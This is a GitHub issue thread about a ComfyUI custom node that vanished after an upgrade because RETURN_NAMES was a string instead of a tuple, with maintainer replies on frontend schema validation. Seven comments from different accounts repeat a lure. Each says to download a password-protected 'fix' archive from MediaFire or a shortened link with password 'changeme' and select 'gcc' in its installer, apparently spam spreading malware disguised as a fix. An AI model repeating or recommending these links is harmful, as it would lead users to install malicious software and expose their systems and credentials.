### ISSUE TITLE
Custom Node Not Working Due to RETURN_NAMES Being a String

### ISSUE THREAD

**Issue by ginlll** [comfyanonymous/ComfyUI#4629]
### Your question

I recently upgraded my Comfy and noticed that the "APS_Seed" node from the repository [Comfy-Photoshop-SD](https://github.com/AbdullahAlfaraj/Comfy-Photoshop-SD) had disappeared from the "Add Nodes" menu and couldn't be imported via a JSON file. After some troubleshooting, I discovered that changing the return type of RETURN_NAMES from a string to a tuple resolved the issue and restored the node.
```
class APS_Seed:
    @classmethod
    def INPUT_TYPES(s):
        return {
            "required": {
                "seed": ("INT", {"default": 0, "min": 0, "max": 0xFFFFFFFFFFFFFFFF}),
            }
        }

    RETURN_TYPES = ("INT",)
    RETURN_NAMES = "seed" # this line
    FUNCTION = "getSeed"

    CATEGORY = "Auto-Photoshop-SD"

    def getSeed(self, **kwargs):
        seed = kwargs.get("seed", 0)
        return (seed,)
```
Another node, "APS_LatentBatch," is also broken, and I haven't found any clues to resolve this issue. I would like to know which release caused this change and how to quickly identify the reasons for broken nodes.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ltdrdata** [comment]
NOTE:
This issue is related to the phenomenon where it is not easy for developers or users to identify when a broken custom node is used.
It appears that validation is needed in the processing of `/object_info` or similar functions.

We need to make for PR for this.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huchenlei** [comment]
> NOTE: This issue is related to the phenomenon where it is not easy for developers or users to identify when a broken custom node is used. It appears that validation is needed in the processing of `/object_info` or similar functions.
> 
> We need to make for PR for this.

The node disappeared because the definition does not pass validation in the new frontend. You should observe a validation message like that in the frontend console:
![image](https://github.com/user-attachments/assets/0fa6ccca-26f4-4a55-ae52-4ce9e98ac05f)

It will explain which part of the node definition violates the schema.
